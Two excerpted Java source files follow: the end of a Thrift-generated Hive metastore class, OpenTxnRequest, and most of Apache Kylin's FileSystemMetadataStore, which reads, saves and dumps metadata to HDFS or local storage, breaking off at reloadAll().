hashCode = 1; hashCode = hashCode * 8191 + num_txns; hashCode = hashCode * 8191 + ((isSetUser()) ? 131071 : 524287); if (isSetUser()) hashCode = hashCode * 8191 + user.hashCode(); hashCode = hashCode * 8191 + ((isSetHostname()) ? 131071 : 524287); if (isSetHostname()) hashCode = hashCode * 8191 + hostname.hashCode(); hashCode = hashCode * 8191 + ((isSetAgentInfo()) ? 131071 : 524287); if (isSetAgentInfo()) hashCode = hashCode * 8191 + agentInfo.hashCode(); hashCode = hashCode * 8191 + ((isSetReplPolicy()) ? 131071 : 524287); if (isSetReplPolicy()) hashCode = hashCode * 8191 + replPolicy.hashCode(); hashCode = hashCode * 8191 + ((isSetReplSrcTxnIds()) ? 131071 : 524287); if (isSetReplSrcTxnIds()) hashCode = hashCode * 8191 + replSrcTxnIds.hashCode(); hashCode = hashCode * 8191 + ((isSetTxn_type()) ? 131071 : 524287); if (isSetTxn_type()) hashCode = hashCode * 8191 + txn_type.getValue(); return hashCode; } @Override public int compareTo(OpenTxnRequest other) { if (!getClass().equals(other.getClass())) { return getClass().getName().compareTo(other.getClass().getName()); } int lastComparison = 0; lastComparison = java.lang.Boolean.compare(isSetNum_txns(), other.isSetNum_txns()); if (lastComparison != 0) { return lastComparison; } if (isSetNum_txns()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.num_txns, other.num_txns); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetUser(), other.isSetUser()); if (lastComparison != 0) { return lastComparison; } if (isSetUser()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.user, other.user); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetHostname(), other.isSetHostname()); if (lastComparison != 0) { return lastComparison; } if (isSetHostname()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.hostname, other.hostname); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetAgentInfo(), other.isSetAgentInfo()); if (lastComparison != 0) { return lastComparison; } if (isSetAgentInfo()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.agentInfo, other.agentInfo); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetReplPolicy(), other.isSetReplPolicy()); if (lastComparison != 0) { return lastComparison; } if (isSetReplPolicy()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.replPolicy, other.replPolicy); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetReplSrcTxnIds(), other.isSetReplSrcTxnIds()); if (lastComparison != 0) { return lastComparison; } if (isSetReplSrcTxnIds()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.replSrcTxnIds, other.replSrcTxnIds); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetTxn_type(), other.isSetTxn_type()); if (lastComparison != 0) { return lastComparison; } if (isSetTxn_type()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.txn_type, other.txn_type); if (lastComparison != 0) { return lastComparison; } } return 0; } @org.apache.thrift.annotation.Nullable public _Fields fieldForId(int fieldId) { return _Fields.findByThriftId(fieldId); } public void read(org.apache.thrift.protocol.TProtocol iprot) throws org.apache.thrift.TException { scheme(iprot).read(iprot, this); } public void write(org.apache.thrift.protocol.TProtocol oprot) throws org.apache.thrift.TException { scheme(oprot).write(oprot, this); } @Override public java.lang.String toString() { java.lang.StringBuilder sb = new java.lang.StringBuilder("OpenTxnRequest("); boolean first = true; sb.append("num_txns:"); sb.append(this.num_txns); first = false; if (!first) sb.append(", "); sb.append("user:"); if (this.user == null) { sb.append("null"); } else { sb.append(this.user); } first = false; if (!first) sb.append(", "); sb.append("hostname:"); if (this.hostname == null) { sb.append("null"); } else { sb.append(this.hostname); } first = false; if (isSetAgentInfo()) { if (!first) sb.append(", "); sb.append("agentInfo:"); if (this.agentInfo == null) { sb.append("null"); } else { sb.append(this.agentInfo); } first = false; } if (isSetReplPolicy()) { if (!first) sb.append(", "); sb.append("replPolicy:"); if (this.replPolicy == null) { sb.append("null"); } else { sb.append(this.replPolicy); } first = false; } if (isSetReplSrcTxnIds()) { if (!first) sb.append(", "); sb.append("replSrcTxnIds:"); if (this.replSrcTxnIds == null) { sb.append("null"); } else { sb.append(this.replSrcTxnIds); } first = false; } if (isSetTxn_type()) { if (!first) sb.append(", "); sb.append("txn_type:"); if (this.txn_type == null) { sb.append("null"); } else { sb.append(this.txn_type); } first = false; } sb.append(")"); return sb.toString(); } public void validate() throws org.apache.thrift.TException { // check for required fields if (!isSetNum_txns()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'num_txns' is unset! Struct:" + toString()); } if (!isSetUser()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'user' is unset! Struct:" + toString()); } if (!isSetHostname()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'hostname' is unset! Struct:" + toString()); } // check for sub-struct validity } private void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException { try { write(new org.apache.thrift.protocol.TCompactProtocol(new org.apache.thrift.transport.TIOStreamTransport(out))); } catch (org.apache.thrift.TException te) { throw new java.io.IOException(te); } } private void readObject(java.io.ObjectInputStream in) throws java.io.IOException, java.lang.ClassNotFoundException { try { // it doesn't seem like you should have to do this, but java serialization is wacky, and doesn't call the default constructor. __isset_bitfield = 0; read(new org.apache.thrift.protocol.TCompactProtocol(new org.apache.thrift.transport.TIOStreamTransport(in))); } catch (org.apache.thrift.TException te) { throw new java.io.IOException(te); } } private static class OpenTxnRequestStandardSchemeFactory implements org.apache.thrift.scheme.SchemeFactory { public OpenTxnRequestStandardScheme getScheme() { return new OpenTxnRequestStandardScheme(); } } private static class OpenTxnRequestStandardScheme extends org.apache.thrift.scheme.StandardScheme<OpenTxnRequest> { public void read(org.apache.thrift.protocol.TProtocol iprot, OpenTxnRequest struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TField schemeField; iprot.readStructBegin(); while (true) { schemeField = iprot.readFieldBegin(); if (schemeField.type == org.apache.thrift.protocol.TType.STOP) { break; } switch (schemeField.id) { case 1: // NUM_TXNS if (schemeField.type == org.apache.thrift.protocol.TType.I32) { struct.num_txns = iprot.readI32(); struct.setNum_txnsIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 2: // USER if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.user = iprot.readString(); struct.setUserIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 3: // HOSTNAME if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.hostname = iprot.readString(); struct.setHostnameIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 4: // AGENT_INFO if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.agentInfo = iprot.readString(); struct.setAgentInfoIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 5: // REPL_POLICY if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.replPolicy = iprot.readString(); struct.setReplPolicyIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 6: // REPL_SRC_TXN_IDS if (schemeField.type == org.apache.thrift.protocol.TType.LIST) { { org.apache.thrift.protocol.TList _list796 = iprot.readListBegin(); struct.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(_list796.size); long _elem797; for (int _i798 = 0; _i798 < _list796.size; ++_i798) { _elem797 = iprot.readI64(); struct.replSrcTxnIds.add(_elem797); } iprot.readListEnd(); } struct.setReplSrcTxnIdsIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 7: // TXN_TYPE if (schemeField.type == org.apache.thrift.protocol.TType.I32) { struct.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.findByValue(iprot.readI32()); struct.setTxn_typeIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; default: org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } iprot.readFieldEnd(); } iprot.readStructEnd(); struct.validate(); } public void write(org.apache.thrift.protocol.TProtocol oprot, OpenTxnRequest struct) throws org.apache.thrift.TException { struct.validate(); oprot.writeStructBegin(STRUCT_DESC); oprot.writeFieldBegin(NUM_TXNS_FIELD_DESC); oprot.writeI32(struct.num_txns); oprot.writeFieldEnd(); if (struct.user != null) { oprot.writeFieldBegin(USER_FIELD_DESC); oprot.writeString(struct.user); oprot.writeFieldEnd(); } if (struct.hostname != null) { oprot.writeFieldBegin(HOSTNAME_FIELD_DESC); oprot.writeString(struct.hostname); oprot.writeFieldEnd(); } if (struct.agentInfo != null) { if (struct.isSetAgentInfo()) { oprot.writeFieldBegin(AGENT_INFO_FIELD_DESC); oprot.writeString(struct.agentInfo); oprot.writeFieldEnd(); } } if (struct.replPolicy != null) { if (struct.isSetReplPolicy()) { oprot.writeFieldBegin(REPL_POLICY_FIELD_DESC); oprot.writeString(struct.replPolicy); oprot.writeFieldEnd(); } } if (struct.replSrcTxnIds != null) { if (struct.isSetReplSrcTxnIds()) { oprot.writeFieldBegin(REPL_SRC_TXN_IDS_FIELD_DESC); { oprot.writeListBegin(new org.apache.thrift.protocol.TList(org.apache.thrift.protocol.TType.I64, struct.replSrcTxnIds.size())); for (long _iter799 : struct.replSrcTxnIds) { oprot.writeI64(_iter799); } oprot.writeListEnd(); } oprot.writeFieldEnd(); } } if (struct.txn_type != null) { if (struct.isSetTxn_type()) { oprot.writeFieldBegin(TXN_TYPE_FIELD_DESC); oprot.writeI32(struct.txn_type.getValue()); oprot.writeFieldEnd(); } } oprot.writeFieldStop(); oprot.writeStructEnd(); } } private static class OpenTxnRequestTupleSchemeFactory implements org.apache.thrift.scheme.SchemeFactory { public OpenTxnRequestTupleScheme getScheme() { return new OpenTxnRequestTupleScheme(); } } private static class OpenTxnRequestTupleScheme extends org.apache.thrift.scheme.TupleScheme<OpenTxnRequest> { @Override public void write(org.apache.thrift.protocol.TProtocol prot, OpenTxnRequest struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TTupleProtocol oprot = (org.apache.thrift.protocol.TTupleProtocol) prot; oprot.writeI32(struct.num_txns); oprot.writeString(struct.user); oprot.writeString(struct.hostname); java.util.BitSet optionals = new java.util.BitSet(); if (struct.isSetAgentInfo()) { optionals.set(0); } if (struct.isSetReplPolicy()) { optionals.set(1); } if (struct.isSetReplSrcTxnIds()) { optionals.set(2); } if (struct.isSetTxn_type()) { optionals.set(3); } oprot.writeBitSet(optionals, 4); if (struct.isSetAgentInfo()) { oprot.writeString(struct.agentInfo); } if (struct.isSetReplPolicy()) { oprot.writeString(struct.replPolicy); } if (struct.isSetReplSrcTxnIds()) { { oprot.writeI32(struct.replSrcTxnIds.size()); for (long _iter800 : struct.replSrcTxnIds) { oprot.writeI64(_iter800); } } } if (struct.isSetTxn_type()) { oprot.writeI32(struct.txn_type.getValue()); } } @Override public void read(org.apache.thrift.protocol.TProtocol prot, OpenTxnRequest struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TTupleProtocol iprot = (org.apache.thrift.protocol.TTupleProtocol) prot; struct.num_txns = iprot.readI32(); struct.setNum_txnsIsSet(true); struct.user = iprot.readString(); struct.setUserIsSet(true); struct.hostname = iprot.readString(); struct.setHostnameIsSet(true); java.util.BitSet incoming = iprot.readBitSet(4); if (incoming.get(0)) { struct.agentInfo = iprot.readString(); struct.setAgentInfoIsSet(true); } if (incoming.get(1)) { struct.replPolicy = iprot.readString(); struct.setReplPolicyIsSet(true); } if (incoming.get(2)) { { org.apache.thrift.protocol.TList _list801 = iprot.readListBegin(org.apache.thrift.protocol.TType.I64); struct.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(_list801.size); long _elem802; for (int _i803 = 0; _i803 < _list801.size; ++_i803) { _elem802 = iprot.readI64(); struct.replSrcTxnIds.add(_elem802); } } struct.setReplSrcTxnIdsIsSet(true); } if (incoming.get(3)) { struct.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.findByValue(iprot.readI32()); struct.setTxn_typeIsSet(true); } } } private static <S extends org.apache.thrift.scheme.IScheme> S scheme(org.apache.thrift.protocol.TProtocol proto) { return (org.apache.thrift.scheme.StandardScheme.class.equals(proto.getScheme()) ? STANDARD_SCHEME_FACTORY : TUPLE_SCHEME_FACTORY).getScheme(); } }
apache/kylin
36,037
src/core-common/src/main/java/org/apache/kylin/common/persistence/metadata/FileSystemMetadataStore.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.kylin.common.persistence.metadata; import static org.apache.hadoop.fs.CommonConfigurationKeysPublic.IO_FILE_BUFFER_SIZE_DEFAULT; import static org.apache.hadoop.fs.CommonConfigurationKeysPublic.IO_FILE_BUFFER_SIZE_KEY; import static org.apache.kylin.common.constant.Constants.CORE_META_DIR; import static org.apache.kylin.common.persistence.metadata.FileSystemFilterFactory.MATCH_ALL_EVAL; import static org.apache.kylin.common.persistence.metadata.FileSystemFilterFactory.convertConditionsToFilter; import static org.apache.kylin.common.util.HadoopUtil.FILE_PREFIX; import static org.apache.kylin.common.util.MetadataChecker.verifyNonMetadataFile; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Comparator; import java.util.Date; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.NavigableSet; import java.util.TreeSet; import java.util.concurrent.ExecutionException; import java.util.concurrent.ExecutorService; import java.util.concurrent.Future; import java.util.concurrent.LinkedBlockingQueue; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.function.BiConsumer; import java.util.stream.Collectors; import java.util.stream.Stream; import java.util.zip.CRC32; import java.util.zip.CheckedOutputStream; import java.util.zip.ZipEntry; import java.util.zip.ZipInputStream; import java.util.zip.ZipOutputStream; import org.apache.commons.io.IOUtils; import org.apache.hadoop.fs.FSDataOutputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.LocalFileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.fs.RawLocalFileSystem; import org.apache.kylin.common.KylinConfig; import org.apache.kylin.common.exception.KylinRuntimeException; import org.apache.kylin.common.persistence.MetadataType; import org.apache.kylin.common.persistence.RawResource; import org.apache.kylin.common.persistence.RawResourceFilter; import org.apache.kylin.common.persistence.ResourceStore; import org.apache.kylin.common.persistence.SnapshotRawResource; import org.apache.kylin.common.persistence.VersionedRawResource; import org.apache.kylin.common.util.DaemonThreadFactory; import org.apache.kylin.common.util.FileSystemUtil; import org.apache.kylin.common.util.HadoopUtil; import org.apache.kylin.common.util.JsonUtil; import org.apache.kylin.common.util.Pair; import org.apache.kylin.guava30.shaded.common.annotations.VisibleForTesting; import org.apache.kylin.guava30.shaded.common.base.Preconditions; import org.apache.kylin.guava30.shaded.common.base.Throwables; import org.apache.kylin.guava30.shaded.common.collect.Lists; import org.apache.kylin.guava30.shaded.common.collect.Maps; import org.apache.kylin.guava30.shaded.common.collect.Sets; import org.apache.kylin.guava30.shaded.common.io.ByteSource; import org.apache.kylin.guava30.shaded.common.util.concurrent.Uninterruptibles; import lombok.Getter; import lombok.val; import lombok.experimental.Delegate; import lombok.extern.slf4j.Slf4j; @Slf4j public class FileSystemMetadataStore extends MetadataStore { public static final String HDFS_SCHEME = "hdfs"; public static final String FILE_SCHEME = "file"; private static final String COMPRESSED_FILE = "metadata.zip"; public static final String JSON_SUFFIX = ".json"; private static final int DEFAULT_FILE_NUMBER = 10000; @Delegate private final FileTransactionHelper helper; @VisibleForTesting protected static volatile ExecutorService fileSystemMetadataExecutor = null; @Getter protected Path rootPath; @Getter protected FileSystem fs; @Getter public enum Type { DIR, ZIP } @VisibleForTesting protected final Type type; private final CompressHandlerInterface compressHandlerInterface; public FileSystemMetadataStore(KylinConfig kylinConfig) throws IOException { // The file system metadata store will use NoopAuditLogStore by default super(kylinConfig); try { val storageUrl = kylinConfig.getMetadataUrl(); val scheme = storageUrl.getScheme(); Preconditions.checkState(HDFS_SCHEME.equals(scheme) || FILE_SCHEME.equals(scheme), "FileSystemMetadataStore only support hdfs or file scheme"); type = storageUrl.getParameter("zip") != null ? Type.ZIP : Type.DIR; compressHandlerInterface = storageUrl.getParameter("snapshot") != null ? new SnapShotCompressHandler() : new CompressHandler(); String pathStr = scheme.equals(HDFS_SCHEME) ? storageUrl.getParameter("path") : kylinConfig.getMetadataUrl().getIdentifier(); initWithMetadataPath(pathStr, scheme, kylinConfig); if (fs instanceof RawLocalFileSystem || fs instanceof LocalFileSystem) { // set this as false to avoid writing crc file when migrate or dump metadata. fs.setWriteChecksum(false); // set this as true to avoid building job failed in UT. fs.setVerifyChecksum(true); } if (!fs.exists(rootPath)) { Path p = rootPath; if (type == Type.ZIP && rootPath.toString().endsWith(".zip")) { p = rootPath.getParent(); } log.warn("Path not exist in FileSystem, create it: {}", p.toString()); fs.mkdirs(p); } if (fileSystemMetadataExecutor == null && kylinConfig.isConcurrencyProcessMetadataEnabled()) { synchronized (FileSystemMetadataStore.class) { if (fileSystemMetadataExecutor == null) { fileSystemMetadataExecutor = new ThreadPoolExecutor( kylinConfig.getConcurrencyProcessMetadataThreadNumber(), kylinConfig.getConcurrencyProcessMetadataThreadNumber(), 300L, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new DaemonThreadFactory("fileSystemMetadataExecutor")); } } } auditLogStore = new MemoryAuditLogStore(kylinConfig); helper = new FileTransactionHelper(this); log.info("The FileSystem location is {}, hdfs root path : {}", fs.getUri().toString(), rootPath.toString()); } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } private void initWithMetadataPath(String pathStr, String scheme, KylinConfig kylinConfig) throws IOException { if (pathStr == null) { assert !scheme.equals(FILE_SCHEME) : "When scheme is file, the pathStr shouldn't be null"; pathStr = HadoopUtil.getBackupFolder(kylinConfig); fs = HadoopUtil.getWorkingFileSystem(); createMetaFolderIfNeed(new Path(pathStr)); Path tmpRootPath = Stream.of(FileSystemUtil.listStatus(fs, new Path(pathStr))) .filter(fileStatus -> fileStatus.getPath().getName().endsWith("_backup")) .max(Comparator.comparing(FileStatus::getModificationTime)).map(FileStatus::getPath) .orElse(new Path(pathStr + "/backup_0/")); createMetaFolderIfNeed(tmpRootPath); rootPath = checkCoreMetaDir(tmpRootPath); } else { if (scheme.equals(FILE_SCHEME) && !pathStr.startsWith(FILE_SCHEME)) { pathStr = FILE_PREFIX + new File(pathStr).getAbsolutePath(); } Path tempPath = new Path(pathStr); if (tempPath.toUri().getScheme() != null) { fs = HadoopUtil.getWorkingFileSystem(tempPath); rootPath = tempPath; } else { fs = HadoopUtil.getWorkingFileSystem(); rootPath = fs.makeQualified(tempPath); } } } // make compatible with old version KE, 'core_meta' directory does not exist in old version KE private Path checkCoreMetaDir(Path tmpRootPath) throws IOException { FileStatus[] fileStatuses = fs.listStatus(tmpRootPath); for (FileStatus fileStatus : fileStatuses) { if (fileStatus.isDirectory() && CORE_META_DIR.equals(fileStatus.getPath().getName())) { return fileStatus.getPath(); } } return tmpRootPath; } /** * Get resource from HDFS * @param type The type of the resource * @param filter The RawResource filter condition * @param needLock File system does not support lock * @param needContent Whether to load the content of the resource * @return The list of the RawResource */ @SuppressWarnings("unchecked") public <T extends RawResource> List<T> get(MetadataType type, RawResourceFilter filter, boolean needLock, boolean needContent) { Preconditions.checkArgument(type != MetadataType.ALL, "Fetching all metadata in the transaction is not allowed."); List<T> resList; val context = convertConditionsToFilter(filter, type); Class<T> resourceClass = (Class<T>) type.getResourceClass(); if (needLock) { if (context.isWholePath()) { lockResource(context.getResPath()); } else { lockResource(type.name()); } } try { if (this.type == Type.DIR) { resList = getFromDir(context, needContent, resourceClass); } else { resList = getFromZip(context, needContent, resourceClass); } } catch (IOException e) { throw new KylinRuntimeException("get resource fail", e); } return resList; } private <T extends RawResource> List<T> getFromDir(FileSystemFilterFactory.FilterContext context, boolean needContent, Class<T> resourceClass) throws IOException { List<T> resList = new ArrayList<>(); String resPath = context.getResPath(); RawResourceFilter jsonFilter = context.getRawResourceFilter(); Path p = getRealFileSystemPath(resPath); if (context.isWholePath()) { if (fs.exists(p) && fs.isFile(p)) { T rawResource = getRawResource(needContent, fs.getFileStatus(p), resourceClass, jsonFilter); if (rawResource != null) resList.add(rawResource); } } else { // With complex query, need to traverse files by filter `jsonFilter` if (fs.exists(p) && fs.isDirectory(p)) { val stream = context.getRegex() == null ? Arrays.stream(fs.listStatus(p)) : Arrays.stream(fs.globStatus(new Path(rootPath, resPath + "/" + MATCH_ALL_EVAL), path -> path.getName().matches(context.getRegex()))); stream.forEach(path -> { T rawResource = getRawResource(needContent, path, resourceClass, jsonFilter); if (rawResource != null) resList.add(rawResource); }); } } return resList; } private <T extends RawResource> List<T> getFromZip(FileSystemFilterFactory.FilterContext context, boolean needContent, Class<T> resourceClass) { List<T> resList = new ArrayList<>(); String resPath = context.getResPath(); RawResourceFilter jsonFilter = context.getRawResourceFilter(); if (context.isWholePath()) { val rawResource = resourceClass.cast(getCompressedFiles().get(resPath)); if (rawResource != null && jsonFilter.isMatch(rawResource)) { if (!needContent) { rawResource.setContent(null); } resList.add(rawResource); } } else { // With complex query, need to traverse files by filter `jsonFilter` getCompressedFiles().entrySet().stream() .filter(entry -> entry.getKey().startsWith(context.getResPath()) && (context.getRegex() == null || entry.getKey().matches(context.getResPath() + "/" + context.getRegex()))) .forEach(entry -> { val rawResource = resourceClass.cast(entry.getValue()); if (jsonFilter.isMatch(rawResource)) { if (!needContent) { rawResource.setContent(null); } resList.add(rawResource); } }); } return resList; } private <T extends RawResource> T getRawResource(boolean needContent, FileStatus fileStatus, Class<T> resourceClass, RawResourceFilter jsonFilter) { if (fileStatus.getLen() == 0) { log.warn("Zero length file: " + fileStatus.getPath().toString()); } String filePath = fileStatus.getPath().toString().replace(rootPath.toString(), ""); if (verifyNonMetadataFile(filePath)) { return null; } if (filePath.split("/", 2).length != 2) { throw new IllegalStateException("Can not get file path: " + filePath + "."); } String fileName = splitFilePath(filePath).getValue(); String metaKey = fileName.substring(0, fileName.length() - 5); T rawResource = openFileWithRetry(fileStatus.getPath(), resourceClass, needContent, 3); long ts = fileStatus.getModificationTime(); rawResource.setTs(ts); rawResource.setMetaKey(metaKey); rawResource.setMvcc(0); return jsonFilter.isMatch(rawResource) ? rawResource : null; } private <T extends RawResource> T openFileWithRetry(Path filePath, Class<T> resourceClass, boolean needContent, int retryCnt) { T rawResource; byte[] byteArray = null; try (val in = fs.open(filePath)) { byteArray = IOUtils.toByteArray(in); rawResource = JsonUtil.readValue(byteArray, resourceClass); } catch (Exception e) { log.warn("Failed to load resource from file: " + filePath); if (byteArray != null && byteArray.length == 0 && retryCnt > 0) { // Maybe this file is modified by others now, retry it. try { Thread.sleep(100); } catch (InterruptedException ex) { Thread.currentThread().interrupt(); throw new KylinRuntimeException(ex); } return openFileWithRetry(filePath, resourceClass, needContent, retryCnt - 1); } try { rawResource = resourceClass.newInstance(); } catch (Exception ex) { throw new KylinRuntimeException(ex); } } if (needContent) { rawResource.setContent(byteArray); } return rawResource; } public KylinConfig getKylinConfigFromFile() { Path confPath = new Path(rootPath, "kylin.properties"); try { if (!fs.exists(confPath)) { throw new KylinRuntimeException("kylin.properties not exist under: " + rootPath); } try (val in = fs.open(confPath)) { return KylinConfig.createKylinConfig(KylinConfig.streamToProps(in)); } } catch (IOException e) { throw new KylinRuntimeException("Read kylin.properties failed from file system."); } } private void dumpKylinConfigToFile(KylinConfig conf) { Path confPath = new Path(rootPath, "kylin.properties"); try (FSDataOutputStream out = fs.create(confPath, true)) { conf.exportToProperties().store(out, confPath.toString()); } catch (Exception e) { throw new KylinRuntimeException("Dump resource fail", e); } } @Override public int save(MetadataType type, final RawResource raw) { val resPath = raw.generateFilePath(); val p = getRealFileSystemPath(resPath); try { createMetaFolderIfNeed(p.getParent()); val bytes = raw.getContent(); if (bytes == null) { return fs.delete(p, true) ? 1 : 0; } val bs = ByteSource.wrap(raw.getContent()); try (FSDataOutputStream out = createFileWithDefaultPermission(p)) { IOUtils.copy(bs.openStream(), out); out.hflush(); fs.setTimes(p, raw.getTs(), -1); } val fileStatus = fs.getFileStatus(p); if (fileStatus.getLen() == 0) { throw new KylinRuntimeException( "Put resource fail : " + resPath + ", because resource file is Zero length"); } if (bs.size() != fileStatus.getLen()) { throw new KylinRuntimeException( "Put resource fail : " + resPath + ", because resource file length not equal with ByteSource"); } } catch (IOException e) { throw new KylinRuntimeException(e); } return 1; } private FSDataOutputStream createFileWithDefaultPermission(Path f) throws IOException { return fs.create(f, null, true, fs.getConf().getInt(IO_FILE_BUFFER_SIZE_KEY, IO_FILE_BUFFER_SIZE_DEFAULT), fs.getDefaultReplication(f), fs.getDefaultBlockSize(f), null); } @Override public NavigableSet<String> listAll() { try { if (compressedFilesContains("/")) { return Sets.newTreeSet(getAllFilePathFromCompressedFiles()); } Path p = this.rootPath; if (!fs.exists(p) || !fs.isDirectory(p)) { log.warn("path {} does not exist in HDFS", p); return new TreeSet<>(); } // if you set kylin.env.engine-write-fs, the schema may be inconsistent. val replacedPath = Path.getPathWithoutSchemeAndAuthority(rootPath); val replacedValue = fs.makeQualified(replacedPath).toString(); return getAllFilePath(p, fs).parallelStream().map(path -> { String replaced = path.toString().replace(replacedValue + "/", ""); return pathWithoutJsonSuffix(replaced); }).collect(Collectors.toCollection(TreeSet::new)); } catch (IOException e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } protected RawResource loadOne(FileStatus status, Path parentPath) throws IOException, InstantiationException, IllegalAccessException { Path p = status.getPath(); if (status.getLen() == 0) { log.warn("Zero length file: " + p.toString()); } // if you set kylin.env.engine-write-fs, the schema may be inconsistent. val replacedPath = Path.getPathWithoutSchemeAndAuthority(parentPath); val replacedValue = fs.makeQualified(replacedPath).toString(); String replaced = p.toString().replace(replacedValue, ""); if (verifyNonMetadataFile(replaced)) { return null; } val srcPair = splitFilePath(replaced); RawResource res; byte[] byteArray; val resourceClass = srcPair.getKey().getResourceClass(); long ts = status.getModificationTime(); try (val in = fs.open(p)) { String metaKey = srcPair.getValue().substring(0, srcPair.getValue().length() - 5); byteArray = IOUtils.toByteArray(in); try { res = JsonUtil.readValue(byteArray, resourceClass); } catch (Exception e) { log.warn("Failed to load resource from file: " + p + ". This json file is broken!"); res = resourceClass.newInstance(); } if (res.getMetaKey() == null) { res.setMetaKey(metaKey); } res.setContent(byteArray); res.setMvcc(0); res.setTs(ts); return res; } } @Override public void dump(ResourceStore store) throws IOException, InterruptedException, ExecutionException { val resources = store.listResourcesRecursively(MetadataType.ALL.name()); if (Type.ZIP.name().equals(this.type.name())) { dumpToZip(store, resources, new Path(this.rootPath, COMPRESSED_FILE)); } else { dumpToFile(store, resources); } } /** * Dump metadata compressed file to FileSystem * @param store * @param resources * @throws IOException * @throws InterruptedException */ @Override public void dump(ResourceStore store, Collection<String> resources) throws IOException, InterruptedException { val compressedFile = new Path(this.rootPath, COMPRESSED_FILE); dumpToZip(store, resources, compressedFile); } public void dumpToFile(ResourceStore resourceStore, Collection<String> resources) throws ExecutionException, InterruptedException { dumpKylinConfigToFile(resourceStore.getConfig()); if (resources == null || resources.isEmpty()) { log.info("there is no resources to dump, please check."); return; } if (fileSystemMetadataExecutor == null || resources.size() < DEFAULT_FILE_NUMBER) { try { super.dump(resourceStore, resources); } catch (Exception e) { throw new KylinRuntimeException(e); } } else { List<String> batchResources = new ArrayList<>(DEFAULT_FILE_NUMBER); List<Future<Boolean>> futures = Lists.newArrayList(); for (String resPath : resources) { batchResources.add(resPath); if (batchResources.size() >= DEFAULT_FILE_NUMBER) { futures.addAll(batchInsertByResources(batchResources, resourceStore)); batchResources = new ArrayList<>(DEFAULT_FILE_NUMBER); } } // end for resources if (!batchResources.isEmpty()) { futures.addAll(batchInsertByResources(batchResources, resourceStore)); } if (!futures.isEmpty()) { for (Future<Boolean> task : futures) { task.get(); } } } // end else } /** * Dump metadata compressed file to FileSystem * * @param store Current ResourceStore * @param resources The resources to be dumped * @param compressedFile The path of the compressed file * @throws IOException * @throws InterruptedException */ public void dumpToZip(ResourceStore store, Collection<String> resources, Path compressedFile) throws IOException, InterruptedException { if (resources != null && !resources.isEmpty()) { try (FSDataOutputStream out = fs.create(compressedFile, true); ZipOutputStream zipOut = new ZipOutputStream(new CheckedOutputStream(out, new CRC32()))) { for (String resPath : resources) { val raw = store.getResource(resPath); if (Thread.interrupted()) { throw new InterruptedException(); } if (raw == null) { continue; } compress(zipOut, raw, resPath); } } catch (IOException e) { throw new IOException("Put compressed resource fail", e); } } else { log.info("there is no resources, please check."); } } private List<Future<Boolean>> batchInsertByResources(List<String> batchResources, ResourceStore resourceStore) { List<Future<Boolean>> taskList = Lists.newArrayList(); final List<String> innerBatchResources = batchResources; taskList.add(fileSystemMetadataExecutor.submit(() -> { for (String resource : innerBatchResources) { val raw = resourceStore.getResource(resource); save(raw.getMetaType(), raw); } innerBatchResources.clear(); return true; })); return taskList; } @Override public MemoryMetaData reloadAll() throws IOException { 